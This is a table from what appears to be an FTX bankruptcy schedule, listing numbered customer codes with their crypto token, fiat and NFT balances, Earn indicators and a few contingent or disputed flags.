| 07382807 | | TRX[169.07213701], USD[0.00] | | |
| 07382808 | | ETH[.00574189], ETHW[.00574189], USD[0.00] | | |
| 07382809 | | DOGE[137.79986801], USD[0.00] | | |
| 07382810 | | USD[37.46] | | |
| 07382812 | | CUSDT[9], DOGE[601.84732904], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382813 | | USD[10.00] | | |
| 07382814 | | CUSDT[1], DOGE[1206.43590121], USD[10.00] | | |
| 07382815 | | BTC[.00022469], USD[0.00] | | |
| 07382816 | | USD[10.00] | | |
| 07382817 | | USD[10.00] | | |
| 07382818 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07382819 | | TRX[201.4584788], USD[0.00] | | |
| 07382820 | | ETH[.00000015], ETHW[.00000015], USD[0.00] | Yes | |
| 07382822 | | DOGE[2], USD[9.53] | | |
| 07382823 | | USD[10.00] | | |
| 07382824 | | USD[10.00] | | |
| 07382825 | | BAT[1], BRZ[1], CUSDT[3], GRT[3], TRX[1], USD[0.01], USDT[2] | | |
| 07382826 | | MATIC[10.09093486], USD[0.00] | | |
| 07382827 | | BAT[2.11255007], DOGE[13803.83686295], TRX[45500.34203935], USD[12.10] | Yes | |
| 07382829 | | ETH[0], USD[0.00], USDT[0] | | |
| 07382830 | | BAT[2], BRZ[2], CUSDT[1], DOGE[7], GRT[1], LINK[1], MATIC[0], SOL[0.00000001], TRX[2], UNI[4], USD[0.00], USDT[3158.80608890] | | |
| 07382833 | | SOL[.00000001], USD[0.00], USDT[0] | Yes | |
| 07382834 | | USD[10.00] | | |
| 07382835 | | USD[10.00] | | |
| 07382836 | | USD[10.00] | | |
| 07382837 | | USD[10.00] | | |
| 07382838 | | USD[10.00] | | |
| 07382842 | | BAT[1], BRZ[1], CUSDT[2], DOGE[6.18493618], SHIB[2], TRX[4], USD[0.00] | | |
| 07382843 | | SOL[1.05473818], USD[10.00] | | |
| 07382844 | | USD[10.00] | | |
| 07382846 | | DOGE[379.50285466], USD[0.00] | | |
| 07382848 | | USD[10.00] | | |
| 07382849 | | BRZ[1], CUSDT[15], TRX[1], USD[0.00], USDT[1.10975181] | Yes | |
| 07382850 | | DOGE[127.768961], USD[0.00] | | |
| 07382851 | | USD[10.00] | | |
| 07382852 | | USD[10.00] | | |
| 07382853 | | BRZ[3], CUSDT[5], GRT[1], TRX[6], USD[0.00], USDT[1] | | |
| 07382854 | | BCH[.0192483], USD[0.00] | | |
| 07382855 | | USD[10.00] | | |
| 07382856 | | BRZ[1], CUSDT[2], DOGE[13894.75803868], ETH[.04883621], ETHW[.04823144], SOL[7.24522058], TRX[1043.32169199], USD[0.00] | Yes | |
| 07382858 | | USD[10.00] | | |
| 07382860 | | USD[10.00] | | |
| 07382861 | | USD[10.00] | | |
| 07382862 | | CUSDT[2], DOGE[3954.97293132], SHIB[174425.73179562], USD[0.36] | Yes | |
| 07382863 | | USD[10.00] | | |
| 07382866 | | DOGE[1981.017], LINK[41.9], SOL[138.19381927], USD[0.00] | | |
| 07382867 | | USD[10.00] | | |
| 07382868 | | BTC[.00123929], DOGE[2], USD[0.00] | | |
| 07382870 | | SHIB[369685.76709796], USD[0.00] | | |
| 07382872 | | DOGE[15.59538168], NFT [366970268035146170/Coachella x FTX Weekend 1 #11779][1], USD[0.00] | | |
| 07382874 | | USD[10.00] | | |
| 07382875 | | USD[10.00] | | |
| 07382877 | | DOGE[0.00130648], USD[0.00] | Yes | |
| 07382878 | | USD[10.00] | | |
| 07382880 | | USD[10.00] | | |
| 07382882 | | BTC[.00021253], DOGE[1], USD[0.00] | | |
| 07382883 | | BRZ[1], CUSDT[5], TRX[1], USD[0.01] | | |
| 07382884 | | BAT[8.54251771], CUSDT[33], DOGE[654.01063068], LINK[2.86288649], LTC[.12334128], SUSHI[1.00674016], TRX[295.72670141], UNI[.68796693], USD[0.01], USDT[24.86018359] | | |
| 07382885 | | USD[10.00] | | |
| 07382886 | | DOGE[0], ETH[0], TRX[2.85731175], USD[0.00], USDT[0] | Yes | |
| 07382887 | | USD[10.00] | | |
| 07382888 | | DOGE[126.81705055], USD[0.00] | | |
| 07382891 | | GRT[.08673366], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382892 | | DOGE[2], GRT[4.8581185], USD[0.53] | | |
| 07382893 | | BTC[.00213342], DOGE[1378.68031379], USD[0.00] | | |
| 07382895 | | BRZ[1], CUSDT[2], DOGE[89564.66568093], LINK[2.10848988], SUSHI[1.05286912], TRX[2], UNI[1.0542451], USD[0.00], USDT[1.05419696] | Yes | |
| 07382896 | | BTC[0], DOGE[0.18843502], ETH[0], USD[0.00] | Yes | |
| 07382897 | | BTC[.00022741], CUSDT[1], DOGE[5.13836325], TRX[1], USD[0.00] | Yes | |
| 07382898 | | USD[10.00] | | |
| 07382899 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | | |
| 07382900 | | USD[10.00] | | |
| 07382902 | | BTC[.00163857], CUSDT[2], DOGE[543.47890105], ETH[.04761069], ETHW[.04702202], TRX[2.00044378], USD[0.01], YFI[.00495452] | Yes | |
| 07382903 | | BTC[0], DOGE[0.00047764], USD[0.26] | | |
| 07382904 | | USD[10.00] | | |
| 07382905 | | USD[10.00] | | |
| 07382906 | | BRZ[1], GRT[1], TRX[6535.37262965], USD[0.00] | | |
| 07382907 | | BCH[0], BTC[0], LINK[0], USD[0.00], YFI[0] | Yes | |
| 07382910 | | USD[0.00] | | |
| 07382911 | | DOGE[122.17221713], USD[0.00] | | |
| 07382912 | | USD[10.69] | Yes | |
| 07382914 | | DOGE[173.27187726], USD[0.00] | | |
| 07382915 | | CAD[0.00], CUSDT[1], TRX[1], USD[0.25] | | |
| 07382916 | | BTC[0], CUSDT[3], DOGE[2], TRX[2.14285096], USD[0.01] | Yes | |
| 07382917 | | ETH[0], TRX[1], USD[0.01], USDT[0.00008777] | | |
| 07382919 | | USD[10.00] | | |
| 07382920 | | USD[10.00] | | |
| 07382921 | | USD[10.00] | | |
| 07382922 | | USD[10.00] | | |
| 07382924 | | USD[10.00] | | |
| 07382925 | | NFT (464274009158367265/Coachella x FTX Weekend 2 #10689)[1] | | |
| 07382926 | | BTC[.00021384], DOGE[184.6207502], ETH[.03965403], ETHW[.03965403], SUSHI[1.19734262], TRX[1], USD[25.00] | | |
| 07382927 | | USD[0.00] | | |
| 07382928 | | DOGE[151.67818257], TRX[1], USD[0.00] | | |
| 07382929 | | USD[0.00] | | |
| 07382930 | | CUSDT[7], DOGE[831.09854324], SUSHI[121.71652401], TRX[5], USD[0.46] | | |
| 07382931 | | USD[0.00], USDT[0] | | |
| 07382933 | | BTC[.002187778], CUSDT[1], DOGE[1.00002934], TRX[1], USD[0.00] | Yes | |
| 07382934 | | BTC[0.00046973], SHIB[2], USD[0.00] | | |
| 07382935 | | BTC[0], CUSDT[1], DOGE[0], USD[0.00] | | |
| 07382936 | | BRZ[2], CUSDT[12], DOGE[.95310331], SHIB[72885.29755572], TRX[.86746141], USD[245.04], USDT[1.08654633] | Yes | |
| 07382937 | | CUSDT[4], TRX[667.41570521], USD[0.00] | Yes | |
| 07382939 | | BCH[0], BTC[0], CUSDT[2], DOGE[1], ETH[0], EUR[0.00], SOL[0], UNI[0], USD[0.00], USDT[0] | | |
| 07382941 | | USD[10.00] | | |
| 07382942 | | BTC[0.00000223], ETHW[.062937], LINK[.08], LTC[.00125], USD[3.9323754] | | |
| 07382943 | | SHIB[1], TRX[65.39989967], USD[14.04] | | |
| 07382944 | | DOGE[123.44561905], USD[0.00] | | |
| 07382945 | | DOGE[3], USD[0.01] | | |
| 07382946 | | DOGE[0], ETH[0.00000136], ETHW[0.00000136], TRX[2], USD[0.01] | Yes | |
| 07382947 | | BAT[.5326], BTC[0], DOGE[781.5864], USD[7.02], USDT[0] | | |
| 07382949 | | CUSDT[1], DOGE[3153.87841772], ETH[.0281341], ETHW[.0281341], USD[0.00] | | |
| 07382950 | | USD[0.00] | Yes | |
| 07382951 | | BAT[2.06707767], BF_POINT[100], BRZ[2], BTC[.03984721], CUSDT[8], DOGE[6.09569663], TRX[1], USD[0.00], USDT[1.06411754] | Yes | |
| 07382952 | | DOGE[39.1848277], USD[0.00] | | |
| 07382955 | | USD[0.00] | | |
| 07382956 | | USD[10.00] | | |
| 07382957 | | CUSDT[1], DOGE[37664.38410776], TRX[2], USD[0.00] | | |
| 07382962 | | CUSDT[1], USD[0.48] | | |
| 07382963 | | BCH[0], DOGE[0], TRX[1], USD[0.01] | | |
| 07382964 | | USD[10.00] | | |
| 07382965 | | USD[10.00] | | |
| 07382967 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07382968 | | CUSDT[1], DOGE[.00002086], TRX[1], USD[0.01] | | |
| 07382969 | | USD[10.00] | | |
| 07382970 | | USD[10.00] | | |
| 07382972 | | USD[10.00] | | |
| 07382974 | | USD[10.00] | | |
| 07382976 | | SUSHI[18.426], USD[4.11] | | |
| 07382978 | | CUSDT[2], DOGE[.00005906], USD[0.01] | | |
| 07382980 | | BRZ[1], CUSDT[1], TRX[2], USD[194.46] | | |
| 07382981 | | SOL[2.63335954], USD[0.00] | | |
| 07382982 | | BRZ[1], CUSDT[7], DOGE[1], GRT[1.00264271], SHIB[0], TRX[1], USD[0.00], USDT[0.00046650] | Yes | |
| 07382984 | | USD[0.01] | | |
| 07382985 | | USD[10.00] | | |
| 07382986 | | USD[10.00] | | |
| 07382988 | | DOGE[169.25250646], USD[0.00] | | |
| 07382989 | | DOGE[15.4243121], TRX[13609.086422], USD[0.00] | | |
| 07382990 | | BTC[.00790367], SOL[11.1552], USD[0.00] | | |
| 07382991 | | USD[10.00] | | |
| 07382992 | | BRZ[1], DOGE[0], GBP[0.00], TRX[.00000001], USD[35.24] | | |
| 07382993 | | BRZ[1], CUSDT[4], DOGE[1620.05485815], ETH[.04250966], ETHW[.04250966], LTC[.93601328], TRX[2], USD[0.00] | | |
| 07382996 | | USD[0.01] | | |
| 07382997 | | USD[10.00] | | |
| 07382998 | | SOL[0], USD[0.00], USDT[0.00000010] | | |
| 07382999 | | USD[10.00] | | |
| 07383000 | | USD[0.00] | Yes | |
| 07383004 | | BRZ[2], BTC[.01777582], CUSDT[16], DOGE[1346.61397685], ETH[.19622], ETHW[.19600878], GRT[1], SOL[19.63437106], TRX[1], USD[0.00] | Yes | |
| 07383006 | | USD[10.00] | | |
| 07383007 | | BTC[0], DOGE[5.43338817], ETH[0], ETHW[0], LTC[0], SOL[0], USD[0.00] | | |
| 07383009 | | USD[10.00] | | |
| 07383010 | | BRZ[1], CUSDT[3], DOGE[1], SHIB[760109.45576162], TRX[1], USD[0.01] | | |
| 07383011 | | TRX[.0713754], USD[0.00], USDT[0] | | |
| 07383012 | | ALGO[13.29090738], BAT[44.04114966], BRZ[106.31191752], CAD[16.48], CUSDT[4053.20797776], DAI[0], DOGE[6459.24262509], ETH[.01300607], ETHW[.01284179], GRT[155.50256076], LINK[8.54406889], LTC[0], MATIC[8.57189634], SHIB[231922.23817192], SOL[2.20210649], TRX[4850.29507744], USD[0.00] | Yes | |
| 07383013 | | USD[10.00] | | |
| 07383014 | | USD[10.00] | | |
| 07383015 | | SOL[.00000936], USD[9.63] | | |
| 07383016 | | AAVE[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], SHIB[44437.72807665], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07383017 | | USD[10.00] | | |
| 07383022 | | USD[10.00] | | |
| 07383024 | | CUSDT[1], DOGE[5530.58168221], SHIB[9887346.41612884], TRX[2], USD[0.00], USDT[1.08404864] | Yes | |
| 07383025 | | USD[10.00] | | |
| 07383028 | | USD[0.00] | | |
| 07383029 | | BTC[.00017687], USD[0.00] | | |
| 07383030 | | DOGE[123.44561905], USD[0.00] | | |
| 07383031 | | CUSDT[1], DOGE[.00000444], USD[14.90] | | |
| 07383032 | | AVAX[283.4163], BTC[.6166827], ETHW[.000416], MATIC[6113.88], NFT (563076462172213825/FTX - Off The Grid Miami #544)[1], SOL[152.22762], USD[61074.12], YFI[.124875] | | |
| 07383033 | | USD[10.00] | | |
| 07383034 | | BAT[0], BTC[0], SOL[0] | | |
| 07383035 | | USD[0.80] | | |
| 07383036 | | BAT[3], BRZ[3], CUSDT[5], DOGE[2], ETHW[.51497279], GRT[2], TRX[6], USD[1791.44], USDT[3] | | |
| 07383037 | | USD[10.00] | | |
| 07383039 | | AAVE[.0025575], BTC[.00001452], USD[4.33], USDT[0] | Yes | |
| 07383041 | | CUSDT[1], DOGE[73.63501288], USD[0.00] | | |
| 07383042 | | CUSDT[3], USD[0.00] | Yes | |
| 07383043 | | TRX[1], USD[0.00], USDT[1] | | |
| 07383044 | | USD[10.00] | | |
| 07383049 | | BRZ[3], CUSDT[1], SHIB[2], USD[0.00] | | |
| 07383050 | | USD[10.00] | | |
| 07383051 | | GRT[5.80404921], USD[0.00] | | |
| 07383054 | | USD[0.35] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383055 | | USD[10.00] | | |
| 07383056 | | DOGE[102.08468918], USD[0.00] | | |
| 07383058 | | DOGE[34.41529495], TRX[138.41562038], USD[0.00] | | |
| 07383059 | | DOGE[33.94052594], USD[0.00] | | |
| 07383060 | | SHIB[2121.36592007], USD[0.00], USDT[0] | Yes | |
| 07383061 | | DOGE[30.61356925], SOL[.07513844], USD[1.50] | | |
| 07383062 | | DOGE[1], USD[0.01] | | |
| 07383064 | | BTC[0], DOGE[7395.06879671], TRX[0], USD[0.00] | | |
| 07383065 | | BTC[.00041272], CUSDT[1], USD[0.00] | Yes | |
| 07383066 | | USD[10.00] | | |
| 07383067 | | DOGE[152.11561638], USD[0.00] | | |
| 07383069 | | USD[10.00] | | |
| 07383071 | | ETH[.0009272], ETHW[.0009272], USD[0.00] | | |
| 07383073 | | CUSDT[3], DOGE[.43718656], TRX[1], USD[0.02] | | |
| 07383074 | | USD[10.00] | | |
| 07383077 | | CUSDT[1], DOGE[654.15489354], TRX[212.45211594], USD[0.00] | | |
| 07383078 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07383079 | | USD[10.00] | | |
| 07383080 | | SHIB[81.03157135], USD[0.00] | | |
| 07383083 | | USD[10.00] | | |
| 07383084 | | ETH[.00466397], ETHW[.00466397], USD[0.00] | | |
| 07383085 | | AUD[0.00], AVAX[1.60049228], BAT[0], BCH[0], BRZ[37.78998485], BTC[0], CAD[0.00], CHF[0.00], CUSDT[0], DOGE[1], ETH[0], EUR[0.00], GBP[0.00], GRT[0], KSHIB[150.39956452], LINK[0], LTC[.00000088], MATIC[0], MKR[0.03230564], NFT (29312073519497192/Donald Trump)[1], NFT (423179266348997904/Barack Obama)[1], SHIB[727195.22441212], SOL[0], SUSHI[0], TRX[55.21270464], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07383086 | | BCH[0.00358364], BTC[.0000961], CUSDT[111.78817255], DOGE[0.58825543], ETH[0.00122728], ETHW[0.00121360], GRT[0.62872951], LTC[0.01471150], TRX[36.92229940], UNI[0.09217160], USD[0.00], USDT[1.23877498] | Yes | |
| 07383087 | | USD[10.00] | | |
| 07383088 | | CUSDT[3], TRX[177.34127821], USD[0.00] | | |
| 07383089 | | SOL[155.6758], USD[0.97] | | |
| 07383090 | | USD[10.00] | | |
| 07383091 | | USD[0.00] | | |
| 07383092 | | USD[0.00] | Yes | |
| 07383093 | | BCH[0], CUSDT[3], DOGE[1.02740329], ETH[0.00000214], ETHW[0.00000214], GRT[0], TRX[1], USD[0.01] | Yes | |
| 07383094 | | BTC[0], ETH[0], ETHW[0], TRX[0.00000201], USD[44.08], USDT[0] | | TRX[.000002] |
| 07383096 | | USD[10.00] | | |
| 07383097 | | DOGE[.0003074], USD[0.01] | Yes | |
| 07383098 | | SOL[.07961347], USD[0.00] | Yes | |
| 07383099 | | USD[10.00] | | |
| 07383100 | | BRZ[1], BTC[.00021005], CUSDT[5], DOGE[85.21401951], ETH[.01775702], ETHW[.01775702], LINK[.30317878], LTC[.07408417], USD[0.00] | | |
| 07383101 | | DOGE[987.81600146], USD[0.00] | | |
| 07383103 | | CUSDT[1], DOGE[405.33215639], TRX[1], USD[0.00] | Yes | |
| 07383104 | | USD[10.00] | | |
| 07383105 | | BRZ[1], CUSDT[1], SHIB[1], USD[0.00] | | |
| 07383106 | | USD[10.00] | | |
| 07383107 | | USD[10.00] | | |
| 07383108 | | CUSDT[1], DOGE[1923.25771702], TRX[1], USD[0.00] | | |
| 07383110 | | USD[10.00] | | |
| 07383111 | | USD[10.00] | | |
| 07383112 | | USD[10.00] | | |
| 07383113 | | USD[10.00] | | |
| 07383114 | | DOGE[1], USD[32.13] | | |
| 07383115 | | USD[10.00] | | |
| 07383116 | | BRZ[1], CUSDT[1], TRX[1], USD[0.01] | | |
| 07383118 | | BTC[.0001955], USD[0.00] | | |
| 07383120 | | CUSDT[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07383121 | | USD[10.00] | | |
| 07383122 | | USD[17.79] | | |
| 07383123 | | USD[10.00] | | |
| 07383125 | | BTC[0], DOGE[.01018087], SHIB[39186.15446293], USD[13.32] | | |
| 07383126 | Contingent, Disputed | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383128 | | CUSDT[1], DOGE[917.11798091], TRX[1], USD[0.01] | | |
| 07383129 | | CUSDT[1], ETH[0], ETHW[0], SOL[0], TRX[3], USD[0.00] | | |
| 07383130 | | USD[10.00] | | |
| 07383131 | | DOGE[0], ETH[0], ETHW[0], TRX[0.47190975], USD[0.01], YFI[0] | | |
| 07383132 | | USD[10.00] | | |
| 07383133 | | DOGE[154.06108055], USD[0.00] | Yes | |
| 07383134 | | USD[10.00] | | |
| 07383135 | | DOGE[.644], USD[0.00] | | |
| 07383136 | | DOGE[29989.556], USD[0.31] | | |
| 07383137 | | USD[10.00] | | |
| 07383138 | | BRZ[1], BTC[.03760759], LTC[1.55243347], SHIB[5056359.72645703], USD[0.00] | Yes | |
| 07383139 | | USD[10.00] | | |
| 07383140 | | USD[10.00] | | |
| 07383141 | | CUSDT[4], DOGE[1.00003849], USD[0.00] | | |
| 07383143 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07383144 | | ETH[.00532881], ETHW[.00532881], TRX[1], USD[0.00] | | |
| 07383146 | | ETH[0], USD[0.00], USDT[0.00002759] | | |
| 07383147 | | CUSDT[475.94878394], DOGE[1444.19035098], TRX[769.50574057], USD[0.00] | | |
| 07383148 | | DOGE[1], TRX[125.60620764], USD[0.00] | | |
| 07383149 | | USD[10.00] | | |
| 07383150 | | BRZ[5], CUSDT[4], TRX[5], USD[0.01], USDT[1] | | |
| 07383151 | | USD[10.00] | | |
| 07383152 | | BRZ[2], CUSDT[12], DOGE[2], ETH[0], TRX[6], USD[0.00] | | |
| 07383153 | | CUSDT[1], USD[0.01] | | |
| 07383154 | | USD[10.00] | | |
| 07383155 | | BTC[.001069], CUSDT[3], DOGE[110.76173747], ETHW[.01405911], SHIB[20925.87968194], SUSHI[.69309579], TRX[1], USD[21.88] | | |
| 07383156 | | BRZ[1], DOGE[2], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07383157 | | BTC[.00018474], DOGE[1], USD[0.00] | | |
| 07383158 | | CUSDT[1], DOGE[186.85951565], USD[0.00] | | |
| 07383159 | | USD[10.00] | | |
| 07383160 | | CUSDT[2], USD[0.01] | | |
| 07383161 | | AVAX[.0245657], BCH[.00018032], BTC[.00000269], CUSDT[3], DOGE[.0972615], KSHIB[99.81457598], LINK[.00000125], LTC[.00250788], MATIC[.50932953], MKR[.00037512], PAXG[.00003192], SHIB[3], SOL[.0097776], TRX[10.6522839], USD[-1.44], USDT[.00750929] | Yes | |
| 07383162 | | BTC[0], CUSDT[2], DOGE[791.10595680], KSHIB[0], SHIB[0], TRX[2], USD[63.23] | Yes | |
| 07383164 | | CUSDT[4], DOGE[2242.27349223], USD[0.00] | | |
| 07383167 | | CUSDT[1], DOGE[.00070353], SHIB[151020.08388833], USD[14.15] | Yes | |
| 07383168 | | USD[10.00] | | |
| 07383169 | | USD[0.00] | | |
| 07383170 | | CUSDT[2], TRX[1], USD[2435.47] | | |
| 07383171 | | USD[10.00] | | |
| 07383172 | | SOL[.09191144], YFI[.00086] | | |
| 07383174 | | USD[10.00] | | |
| 07383175 | | CUSDT[1], USD[73.48] | | |
| 07383177 | | CUSDT[1], DOGE[1], TRX[1], USD[5.49] | Yes | |
| 07383178 | | BAT[1], CUSDT[2], DOGE[.00000601], TRX[2], USD[0.00] | | |
| 07383179 | | SHIB[4189359.0280687], TRX[1], USD[0.00] | | |
| 07383180 | | USD[10.00] | | |
| 07383181 | | CUSDT[.9826684], DOGE[1], USD[0.00] | Yes | |
| 07383182 | | USD[10.00] | | |
| 07383183 | | DOGE[3.37725835], USD[0.00] | | |
| 07383185 | | CUSDT[8], SHIB[1], TRX[1], USD[0.00] | | |
| 07383186 | | USD[10.00] | | |
| 07383187 | | USD[10.00] | | |
| 07383188 | | USD[10.00] | | |
| 07383190 | | BTC[.3489176], SHIB[26001084.81028833], TRX[1], USD[0.00] | Yes | |
| 07383191 | | USD[10.00] | | |
| 07383193 | | BTC[0], DOGE[1.00001042], USD[0.00] | | |
| 07383194 | | USD[10.00] | | |
| 07383195 | | SHIB[4065867.04614759], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383196 | | USD[10.00] | | |
| 07383197 | | BRZ[4], CUSDT[4], ETH[.72370552], ETHW[.72340146], LTC[3.11819772], SHIB[1], TRX[5406.72917844], USD[103.55] | Yes | |
| 07383198 | | USD[10.00] | | |
| 07383200 | | USD[10.00] | | |
| 07383201 | | BTC[0], USD[0.00] | | |
| 07383202 | | USD[10.00] | | |
| 07383203 | | DOGE[0], USD[0.00] | Yes | |
| 07383204 | | CUSDT[3], DOGE[116.92765567], USD[0.00] | Yes | |
| 07383205 | | USD[10.00] | | |
| 07383206 | | CUSDT[2], DOGE[22.42953976], SUSHI[28.28193278], USD[0.00] | Yes | |
| 07383208 | | USD[10.00] | | |
| 07383210 | | BTC[0.21869204], DOGE[58482.25415], ETH[3.7784071], ETHW[1.7803071], GRT[1644.08445], LINK[18.482425], PAXG[.27513837], SOL[126.08011], SUSHI[34.96675], TRX[17407.4472], UNI[17.78309], USD[10.35], WBTC[.00959088], YFI[.03097055] | | |
| 07383211 | Contingent, Disputed | USD[10.00] | | |
| 07383213 | | CUSDT[1], USD[0.56] | | |
| 07383214 | | USD[10.00] | | |
| 07383215 | | BTC[.00020675], DOGE[.00669927], USD[0.00] | | |
| 07383216 | | BAT[6.81547077], CUSDT[5], DOGE[1.0059441], GRT[5.07172818], LTC[.00000047], SOL[.01667364], SUSHI[.00089547], TRX[20.35257641], UNI[.00022245], USD[0.00] | | |
| 07383217 | | BRZ[.00006485], DOGE[512.94266834], SHIB[90121.59037286], USD[0.00] | Yes | |
| 07383219 | | SUSHI[.448], USD[1.61] | | |
| 07383220 | | USD[10.00] | | |
| 07383221 | | BTC[0], CUSDT[1], DOGE[1], SHIB[1], TRX[.00026289], USD[0.00], USDT[0] | Yes | |
| 07383222 | | USD[10.00] | | |
| 07383224 | | BAT[56.21810678], BCH[.02307475], BRZ[1], BTC[0.00718100], CUSDT[3], DOGE[74.21563893], ETH[.00785295], ETHW[.00775719], EUR[50.05], GBP[42.34], GRT[18.44364202], LTC[.04850586], MATIC[6.57644118], SHIB[1], SOL[1.24193975], SUSHI[1.74413755], TRX[792.03389577], USD[0.00] | Yes | |
| 07383225 | | BRZ[3], CUSDT[10], TRX[4], USD[0.59], USDT[1] | | |
| 07383227 | | USD[10.00] | | |
| 07383228 | | USD[10.00] | | |
| 07383229 | | TRX[1], USD[0.00] | | |
| 07383230 | | DOGE[132.63120143], USD[0.00] | | |
| 07383231 | | ETH[.00000001], ETHW[0], SHIB[106579.88954131], USD[0.00], USDT[0] | Yes | |
| 07383232 | | DOGE[243.38371423], USD[10.00] | | |
| 07383233 | | CUSDT[1], DOGE[2211.95008565], USD[0.00] | Yes | |
| 07383234 | | USD[10.00] | | |
| 07383235 | | USD[10.00] | | |
| 07383236 | | USD[10.00] | | |
| 07383237 | | USD[0.00] | | |
| 07383240 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1], ETH[.00000423], ETHW[0.00000422], GRT[1], NFT [457477633086980037/Imola Ticket Stub #601][1], SHIB[452072.21377059], TRX[5], USD[0.00], USDT[0] | Yes | |
| 07383241 | | BAT[2], BRZ[1], CUSDT[6], DOGE[13253.04086956], TRX[1], USD[0.00] | | |
| 07383242 | | BTC[0], CUSDT[1], DOGE[74.18313706], ETH[0], GRT[0], LTC[0], USD[0.00] | Yes | |
| 07383244 | | SOL[.00135954], USD[0.00], USDT[0] | | |
| 07383245 | | USD[0.00] | | |
| 07383246 | | BF_POINT[300], ETH[.00197946], ETHW[.00195208], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07383247 | | BRZ[1], CUSDT[10], DOGE[6038.93641048], SHIB[639881.33475939], USD[0.04] | Yes | |
| 07383248 | | CUSDT[5], DOGE[2592.73011291], GRT[1], LTC[.51253205], TRX[3], USD[0.00] | | |
| 07383249 | | TRX[224.01489427], USD[0.00] | Yes | |
| 07383250 | | BTC[0], DOGE[0], NFT [451450421577297836/Bahrain Ticket Stub #2276][1], TRX[1], USD[0.00] | | |
| 07383251 | Contingent, Disputed | AAVE[0], AVAX[0.98556276], BCH[0.00028609], BTC[0.00003609], DOGE[0.36983318], ETH[0.34358550], ETHW[0.00296172], GRT[0.94407761], LINK[0], LTC[0.00592053], MATIC[0.56940544], NEAR[.025], SHIB[3000], SOL[0.00328519], SUSHI[0.35017302], TRX[0.09582495], UNI[0.01565358], USD[0.01], USDT[0.17825998], YFI[0] | | |
| 07383253 | | BRZ[1], CUSDT[5], DOGE[1], SHIB[3468194.66537762], USD[0.12], USDT[0] | Yes | |
| 07383254 | | USD[10.00] | | |
| 07383255 | | USD[10.00] | | |
| 07383256 | | BAT[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07383257 | | BAT[3.24021172], BRZ[1], CUSDT[2], DOGE[152687.32100538], GRT[1.00361789], SHIB[1], TRX[12.21284838], USD[0.00], USDT[2.16147698] | Yes | |
| 07383258 | | USD[10.00] | | |
| 07383259 | | CUSDT[1], DOGE[1.92065779], USD[0.00] | | |
| 07383260 | | USD[10.00] | | |
| 07383261 | | BAT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07383262 | | DOGE[121.59116139], USD[0.00] | | |
| 07383264 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07383265 | | USD[10.00] | | |
| 07383267 | | CUSDT[2], DOGE[2519.2389453], USD[0.00] | | |
| 07383268 | | USD[0.00] | | |
| 07383269 | | DOGE[18041.54395871], SOL[2.60576777], TRX[13632.16252074], USD[0.00], USDT[0] | Yes | |
| 07383270 | | USD[0.01] | | |
| 07383271 | | CUSDT[2], GRT[4.7047167], MATIC[0.00023945], TRX[1], USD[0.00] | Yes | |
| 07383274 | | BTC[.00391207], USD[0.00] | | |
| 07383275 | | DOGE[124.39540722], USD[0.00] | | |
| 07383276 | | BRZ[1], DOGE[3907.27777425], TRX[1], USD[0.53] | Yes | |
| 07383277 | | USD[9.97] | | |
| 07383278 | | USD[0.90] | Yes | |
| 07383279 | | SOL[1.14138485], USD[0.00] | | |
| 07383280 | | USD[10.00] | | |
| 07383284 | | CUSDT[1], USD[0.00] | | |
| 07383285 | | DOGE[120.22081972], USD[0.07] | | |
| 07383286 | | BTC[.0167583], CUSDT[155.98096817], DOGE[12.4012663], SHIB[53], TRX[13.07500974], USD[591.27] | Yes | |
| 07383287 | | USD[0.00] | | |
| 07383288 | | BAT[38.56011537], BRZ[1], BTC[.00188053], CUSDT[2827.57376744], DAI[29.76083744], DOGE[5389.76859015], ETH[.21712851], ETHW[.21712851], GRT[38.8121025], LINK[1.78941559], LTC[1.7905015], SOL[14.76382393], SUSHI[2.39729449], TRX[634.61431058], UNI[2.00397615], USD[0.00], USDT[25.43079747] | | |
| 07383289 | | USD[10.00] | | |
| 07383290 | | BCH[.05076382], CUSDT[1], DOGE[246.75398551], LTC[.17378479], SHIB[336.13053132], SUSHI[.68087368], TRX[201.76846019], USD[0.00] | | |
| 07383291 | | SOL[0], USD[0.01] | | |
| 07383292 | | USD[10.00] | | |
| 07383294 | | CUSDT[4], DOGE[847.82021260], TRX[47.32679409], USD[0.00] | | |
| 07383295 | | USD[10.00] | | |
| 07383296 | | BTC[0.00000007], SHIB[86.64346663], SOL[.00006235], USD[0.01] | Yes | |
| 07383297 | | USD[0.00] | | |
